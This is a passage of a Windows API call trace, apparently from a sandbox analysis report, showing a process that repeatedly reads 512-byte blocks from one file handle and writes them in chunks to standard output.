lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.252] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, 
lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.253] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.254] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: 
lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.255] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.256] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 
[0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0132.257] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.258] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType 
(hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] 
